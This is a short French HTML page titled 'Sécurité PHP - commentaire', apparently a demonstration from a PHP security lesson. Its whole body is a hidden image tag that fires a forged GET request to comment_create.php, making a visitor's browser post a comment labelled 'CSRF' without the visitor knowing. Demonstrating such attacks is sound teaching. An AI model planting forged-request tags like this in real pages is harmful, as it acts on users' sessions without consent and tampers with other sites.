<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
                      "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head>
        <title>Sécurité PHP - commentaire</title>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
  <img src="comment_create.php?id_comment=3&id_article=2&title=CSRF&content=Triche&ok=1" />
</body>
</html>
